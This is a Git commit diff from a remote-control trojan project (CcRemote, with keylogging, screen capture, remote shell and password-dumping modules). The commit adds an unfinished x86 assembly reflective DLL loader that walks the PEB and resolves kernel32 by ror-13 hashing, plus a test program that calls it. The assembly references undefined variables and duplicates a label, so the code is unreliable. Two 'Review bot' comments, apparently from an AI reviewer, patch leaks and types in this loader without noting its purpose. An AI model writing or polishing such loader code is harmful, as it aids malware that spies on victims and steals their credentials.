PEB汇编

changcheng 2020-09-21 20:40:40 +08:00
parent d1c3b70e8f
commit d2afef0ac1
12 changed files with 257 additions and 54 deletions



@ -1,28 +1,28 @@
f:\myapp\ccremote\ccmaindll\ccmaindll\release\ccmaindll.pch
f:\myapp\ccremote\ccmaindll\ccmaindll\release\vc141.pdb
f:\myapp\ccremote\ccmaindll\ccmaindll\release\pch.obj
f:\myapp\ccremote\ccmaindll\ccmaindll\release\audio.obj
f:\myapp\ccremote\ccmaindll\ccmaindll\release\until.obj
f:\myapp\ccremote\ccmaindll\ccmaindll\release\keyboardmanager.obj
f:\myapp\ccremote\ccmaindll\ccmaindll\release\buffer.obj
f:\myapp\ccremote\ccmaindll\ccmaindll\release\clientsocket.obj
f:\myapp\ccremote\ccmaindll\ccmaindll\release\videomanager.obj
f:\myapp\ccremote\ccmaindll\ccmaindll\release\videocap.obj
f:\myapp\ccremote\ccmaindll\ccmaindll\release\systemmanager.obj
f:\myapp\ccremote\ccmaindll\ccmaindll\release\shellmanager.obj
f:\myapp\ccremote\ccmaindll\ccmaindll\release\servermanager.obj
f:\myapp\ccremote\ccmaindll\ccmaindll\release\screenspy.obj
f:\myapp\ccremote\ccmaindll\ccmaindll\release\screenmanager.obj
f:\myapp\ccremote\ccmaindll\ccmaindll\release\regmanager.obj
f:\myapp\ccremote\ccmaindll\ccmaindll\release\regeditopt.obj
f:\myapp\ccremote\ccmaindll\ccmaindll\release\regeditex.obj
f:\myapp\ccremote\ccmaindll\ccmaindll\release\manager.obj
f:\myapp\ccremote\ccmaindll\ccmaindll\release\kernelmanager.obj
f:\myapp\ccremote\ccmaindll\ccmaindll\release\install.obj
f:\myapp\ccremote\ccmaindll\ccmaindll\release\dialupass.obj
f:\myapp\ccremote\ccmaindll\ccmaindll\release\audiomanager.obj
f:\myapp\ccremote\ccmaindll\ccmaindll\release\filemanager.obj
f:\myapp\ccremote\ccmaindll\ccmaindll\release\strcry.obj
f:\myapp\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\cl.command.1.tlog
f:\myapp\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\cl.read.1.tlog
f:\myapp\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\cl.write.1.tlog
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\ccmaindll.pch
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\vc141.pdb
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\pch.obj
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\audio.obj
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\until.obj
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\keyboardmanager.obj
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\buffer.obj
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\clientsocket.obj
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\videomanager.obj
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\videocap.obj
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\systemmanager.obj
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\shellmanager.obj
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\servermanager.obj
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\screenspy.obj
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\screenmanager.obj
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\regmanager.obj
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\regeditopt.obj
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\regeditex.obj
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\manager.obj
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\kernelmanager.obj
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\install.obj
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\dialupass.obj
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\audiomanager.obj
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\filemanager.obj
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\strcry.obj
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\cl.command.1.tlog
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\cl.read.1.tlog
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\cl.write.1.tlog


@ -8,14 +8,17 @@ g:\ccremote\ccremote\ccmaindll\ccmaindll\common\login.h(204): warning C4838: 从
g:\ccremote\ccremote\ccmaindll\ccmaindll\common\login.h(204): warning C4309: “初始化”: 截断常量值
g:\ccremote\ccremote\ccmaindll\ccmaindll\common\login.h(231): warning C4996: 'GetVersionExA': 被声明为已否决
g:\windows kits\10\include\10.0.17763.0\um\sysinfoapi.h(378): note: 参见“GetVersionExA”的声明
g:\ccremote\ccremote\ccmaindll\ccmaindll\dllmain.cpp(50): warning C4996: 'strcpy': This function or variable may be unsafe. Consider using strcpy_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
g:\ccremote\ccremote\ccmaindll\ccmaindll\dllmain.cpp(55): warning C4996: 'strcpy': This function or variable may be unsafe. Consider using strcpy_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
g:\windows kits\10\include\10.0.17763.0\ucrt\string.h(133): note: 参见“strcpy”的声明
g:\ccremote\ccremote\ccmaindll\ccmaindll\dllmain.cpp(224): warning C4996: 'strcpy': This function or variable may be unsafe. Consider using strcpy_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
g:\ccremote\ccremote\ccmaindll\ccmaindll\dllmain.cpp(229): warning C4996: 'strcpy': This function or variable may be unsafe. Consider using strcpy_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
g:\windows kits\10\include\10.0.17763.0\ucrt\string.h(133): note: 参见“strcpy”的声明
g:\ccremote\ccremote\ccmaindll\ccmaindll\dllmain.cpp(252): warning C4996: 'fopen': This function or variable may be unsafe. Consider using fopen_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
g:\windows kits\10\include\10.0.17763.0\ucrt\stdio.h(208): note: 参见“fopen”的声明
g:\ccremote\ccremote\ccmaindll\ccmaindll\dllmain.cpp(421): warning C4102: “loc_46327B”: 未引用的标签
LINK : warning LNK4044: 无法识别的选项“/Zc:strictStrings”已忽略
正在创建库 ..\..\bin\server\CcMainDll.lib 和对象 ..\..\bin\server\CcMainDll.exp
正在生成代码
1 of 375 functions ( 0.3%) were compiled, the rest were copied from previous compilation.
1 of 380 functions ( 0.3%) were compiled, the rest were copied from previous compilation.
0 functions were new in current compilation
0 functions had inline decision re-evaluated but remain unchanged
已完成代码的生成


@ -6,7 +6,12 @@
#include "common/install.h"
#include <stdio.h>
#include <shlwapi.h>
#pragma comment(lib,"shlwapi.lib")
#include <iostream>
#include <fstream>
//using namespace std;
struct Connect_Address
@ -231,6 +236,84 @@ extern "C" __declspec(dllexport) void TestFun(char* strHost, int nPort)
FILE * pFile;
long lSize;
char * buffer;
size_t result;
extern "C" __declspec(dllexport) bool InitTestReflectiveLoader()
{
// 一个不漏地读入整个文件,只能采用二进制方式打开
pFile = fopen(".\\..\\..\\bin\\server\\CcMainDll.dll", "rb");
if (pFile == NULL)
{
fputs("File error", stderr);
printf("open file fail");
return false;
}
// 获取文件大小
fseek(pFile, 0, SEEK_END);
lSize = ftell(pFile);
rewind(pFile);
// 分配内存存储整个文件
buffer = (char*)malloc(sizeof(char)*lSize);
if (buffer == NULL)
{
fputs("Memory error", stderr);
printf("Memory alloc falil");
return false;
}
// 将文件拷贝到buffer中
result = fread(buffer, 1, lSize, pFile);
if (result != lSize)
{
fputs("Reading error", stderr);
printf("Load file to memory falil");
return false;
}
return true;
}
inline DWORD GetCurrentPositionAddress()
{
_asm{
@ -242,38 +325,60 @@ inline DWORD GetCurrentPositionAddress()
}
}
inline DWORD call_ror_0xD()
{
_asm {
push ebp
mov ebp, esp
mov eax, [ebp + 8]
ror eax, 0x0D
pop ebp
retn
}
}
enum LocalEnum
{
Nop,
memAddress,
pLoadLibraryA,
pGetProcAddress,
pVirtualAlloc,
pVirtualProtect,
pNtFlushInstructionCache,
varLocalFindPE
memAddress = 4,
pLoadLibraryA = 8,
pGetProcAddress = 0xC,
pVirtualAlloc = 0x10,
pVirtualProtect = 0x14,
pNtFlushInstructionCache = 0x18,
varLocalFindPE = 0x1c,
varLocalFS30_A = 0x20, // var_8
varLocalFS30_B = 0x24, // varLocalFS30_B
var_4 = 0x28, // FullDllName
BaseDllName = 0x2c, // FullDllName
name_hash = 0x30,
var_20 = 0x34
};
extern "C" __declspec(dllexport) void ReflectiveLoader()
{
_asm{
push ebp
mov ebp, esp
sub esp, 0x100
sub esp, 0x100 // 抬高堆栈创建局部变量空间
mov eax, 4
initLocalVar:
initLocalVar: // 循环initLocalVar初始化局部变量空间为0
mov [ebp + eax], 0
inc eax
cmp eax ,0x100
jnz initLocalVar
call GetCurrentPositionAddress //获取当前位置地址
mov [ebp + memAddress], eax //保存当前代码所在的地址 memAddress
call GetCurrentPositionAddress // 获取当前位置地址
mov eax, buffer
mov [ebp + memAddress], eax // 保存当前代码所在的地址 memAddress
addressAdd :
mov eax, 1
test eax, eax //判断eax是否获取到当前地址
test eax, eax // 判断eax是否获取到当前地址
jz find_success
mov ecx, [ebp + memAddress] // 查找DOS头
@ -285,27 +390,112 @@ extern "C" __declspec(dllexport) void ReflectiveLoader()
mov eax, [ebp + memAddress]
mov ecx, [eax + 0x3C] // +3C 找到DOS Header e_lfanew
mov [ebp + varLocalFindPE], ecx
cmp [ebp + varLocalFindPE], 0x40
cmp dword ptr[ebp + varLocalFindPE], 0x40
jb noFindFlag // 地址address - 1
cmp [ebp + varLocalFindPE], 0x400
jnb noFindFlag //; 地址address - 1
cmp dword ptr[ebp + varLocalFindPE], 0x400
jnb noFindFlag // 地址address - 1
mov edx, [ebp + varLocalFindPE]
add edx, [ebp + memAddress]
mov [ebp + varLocalFindPE], edx
mov eax, [ebp + varLocalFindPE]
cmp dword ptr[eax], 0x4550 //; 判断PE Header Signature PE标志
jnz noFindFlag //; 地址address - 1
cmp dword ptr[eax], 0x4550 // 判断PE Header Signature PE标志
jnz noFindFlag // 地址address - 1
jmp find_success // 找到了singtrue 跳转
noFindFlag :
noFindFlag :
mov ecx, [ebp + memAddress]; address - 1
sub ecx, 1
mov [ebp + memAddress], ecx
jmp addressAdd
find_success:
mov edx, fs:[0x30] // 获取PEB结构地址
mov [ebp + varLocalFS30_A], edx
mov eax, [ebp + varLocalFS30_A]
mov ecx, [eax + 0x0C] // 获取Ptr32 _PEB_LDR_DATA 进程加载模块链表(Ldr)
mov [ebp + varLocalFS30_A], ecx
mov edx, [ebp + varLocalFS30_A]
mov eax, [edx + 0x14] // 获取结构中InMemoryOrderModuleList 顺序模块列表
mov [ebp + varLocalFS30_B], eax
loc_46327B:
cmp [ebp + varLocalFS30_B], 0
jz find_moudle_null
mov ecx, [ebp + varLocalFS30_B]
mov edx, [ecx + 0x28] // FullDllName_buff 模块名称
mov [ebp + BaseDllName], edx
mov eax, [ebp + varLocalFS30_B]
mov cx, [eax + 0x24] // UNICODE_STRING FullDllName Length
mov [ebp + var_4], cx // var_4保存FullDllName字符串长度
mov [ebp + name_hash], 0
calc_hash:
mov edx, [ebp + name_hash]
push edx
call call_ror_0xD
add esp, 4
mov [ebp + name_hash], eax // ror后的eax为返回值
mov eax, [ebp + BaseDllName]
movzx ecx, byte ptr[eax]
cmp ecx, 0x61 // 判断获取到的模块字符串的指定位置,小于跳转,地址 + 1比对下一个字母
jl less_flage
mov edx, [ebp + BaseDllName] // 获取名称byte
movzx eax, byte ptr[edx] // eax = byte
mov ecx, [ebp + name_hash] // 计算值
lea edx, [ecx + eax - 0x20] // hash + FullDllName[index] - 0x20
mov [ebp + name_hash], edx // 得到结果
jmp calc_end
less_flage:
add ecx, [ebp + name_hash]
mov[ebp + name_hash], ecx
calc_end:
mov edx, [ebp + BaseDllName] // 名称地址 + 1
add edx, 1
mov [ebp + BaseDllName], edx
mov ax, [ebp + var_4] // 字符串名称长度 - 1
sub ax, 1
mov [ebp + var_4], ax
movzx ecx, [ebp + var_4]
test ecx, ecx // 判断长度是否为0没有为0继续计算hash
jnz calc_hash // 计算简单的模块名称name_hash
cmp [ebp + name_hash], 0x6A4ABC5B // 6A4ABC5B = Kernel32
jnz no_Kernel32_hash // 3CFA685D = ntdll
mov edx, [ebp + varLocalFS30_B] // 获取结构中InMemoryOrderModuleList
mov eax, [edx + 0x10]
mov [ebp + varLocalFS30_A], eax // +10偏移获取DllBase基址
mov ecx, [ebp + varLocalFS30_A]
mov edx, [ebp + varLocalFS30_A]
add edx, [ecx + 0x3C] // 获取PE IMAGE_DOS_HRADER e_lfanew
mov [ebp + var_20], edx
mov eax, 8
imul ecx, eax, 0 // imul 1, 2, 3 2 3乘积保存到1
mov edx, [ebp + var_20]
lea eax, [edx + ecx + 0x78] // 获取IMAGE_OPTIONAL_HEADER -> IMAGE_DATA_DIRECTORY[0] EXPORT 导出表
mov [ebp + exp_AddressOfNames], eax
mov ecx, [ebp + exp_AddressOfNames]
mov edx, [ebp + varLocalFS30_A] // edx = 基地址
add edx, [ecx] // 基地址 + 导出表地址
mov [ebp + var_20], edx
mov eax, [ebp + var_20]
mov ecx, [ebp + varLocalFS30_A]
add ecx, [eax + 0x20] // 获取 IMAGE_EXPORT_DIRECTORY +0x20 AddressOfNames
mov [ebp + exp_AddressOfNames], ecx
mov edx, [ebp + var_20]
mov eax, [ebp + varLocalFS30_A]
add eax, [edx + 0x24] // 获取 IMAGE_EXPORT_DIRECTORY +0x24 AddressOfNameOrdinals
mov [ebp + AddressOfNameOrdinals], eax
mov ecx, 4
mov [ebp + var_4], cx
find_success:
find_moudle_null:
}
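Review bot: InitTestReflectiveLoader never closes pFile — not on its three early returns and not on the success path either — so every call leaks a FILE handle, and buffer is leaked as well when the fread check fails. ftell's result is stored into lSize without a check; on failure it is -1 and `malloc(sizeof(char)*lSize)` then requests (size_t)-1 bytes, while fseek's return is ignored. The whole function is inside this hunk, so cleanup can be centralised on one exit; a rewrite follows. The file-scope globals pFile/lSize/buffer/result are read by the assembly further down (`mov eax, buffer`), so the rewrite keeps them, and a header comment stating that buffer stays allocated after a successful return and is not freed here would help the next reader.
```cpp
extern "C" __declspec(dllexport) bool InitTestReflectiveLoader()
{
	// … unchanged: fopen of the DLL image and its NULL check …
	bool ok = false;
	if (fseek(pFile, 0, SEEK_END) != 0 || (lSize = ftell(pFile)) < 0)
	{
		fputs("File error", stderr);
		goto done;
	}
	rewind(pFile);
	buffer = (char*)malloc((size_t)lSize);
	if (buffer == NULL)
	{
		fputs("Memory error", stderr);
		printf("Memory alloc falil");
		goto done;
	}
	result = fread(buffer, 1, (size_t)lSize, pFile);
	if (result != (size_t)lSize)
	{
		fputs("Reading error", stderr);
		printf("Load file to memory falil");
		free(buffer);
		buffer = NULL;
		goto done;
	}
	ok = true;
done:
	fclose(pFile);   // closed on every path; buffer (when ok) outlives this call
	pFile = NULL;
	return ok;
}
```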


@ -1 +1 @@
f:\myapp\ccremote\ccmaindll\testloaddll\..\..\bin\server\testloaddll.exe
g:\ccremote\ccremote\ccmaindll\testloaddll\..\..\bin\server\testloaddll.exe


@ -1,6 +1,6 @@
C:\Program Files (x86)\Microsoft Visual Studio\2017\Professional\Common7\IDE\VC\VCTargets\Microsoft.CppBuild.targets(377,5): warning MSB8004: Output 目录未以斜杠结尾。 此生成实例将添加斜杠,因为必须有这个斜杠才能正确计算 Output 目录。
G:\VS2017\Common7\IDE\VC\VCTargets\Microsoft.CppBuild.targets(377,5): warning MSB8004: Output 目录未以斜杠结尾。 此生成实例将添加斜杠,因为必须有这个斜杠才能正确计算 Output 目录。
TestLoadDll.cpp
正在生成代码
All 171 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
已完成代码的生成
TestLoadDll.vcxproj -> F:\myapp\CcRemote\CcMainDll\TestLoadDll\..\..\bin\server\TestLoadDll.exe
TestLoadDll.vcxproj -> G:\CcRemote\CcRemote\CcMainDll\TestLoadDll\..\..\bin\server\TestLoadDll.exe


@ -1,2 +1,2 @@
#TargetFrameworkVersion=v4.0:PlatformToolSet=v141:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=10.0.17763.0
Release|Win32|F:\myapp\CcRemote\CcMainDll\|
Release|Win32|G:\CcRemote\CcRemote\CcMainDll\|


@ -11,6 +11,16 @@ int main()
//载入服务端dll hijack test
HMODULE hServerDll = LoadLibrary(".\\..\\..\\bin\\server\\CcMainDll.dll");
typedef int(_cdecl *TestRunInit)();
TestRunInit InitTestReflectiveLoader = (TestRunInit)GetProcAddress(hServerDll, "InitTestReflectiveLoader");
if (InitTestReflectiveLoader != NULL)
{
InitTestReflectiveLoader(); //调用这个函数
}
//声明导出函数类型--导出的TestRun函数
typedef void(_cdecl *TestRunT)();
//寻找dll中导出函数
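Review bot: The return value of `InitTestReflectiveLoader()` is discarded in the added if-block, so when the DLL reports false (file missing, allocation failure or short read) main carries on into the export lookup that follows this hunk with the DLL's buffer unset. Suggest `if (InitTestReflectiveLoader == NULL || !InitTestReflectiveLoader()) { return 1; }` in place of the current block. The typedef also declares the function as returning int while dllmain.cpp exports it as bool; that appears to work here only because the value travels in eax on 32-bit cdecl, so the two declarations should agree, e.g. `typedef bool(_cdecl *TestRunInit)();`. main starts before this hunk and continues after it.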



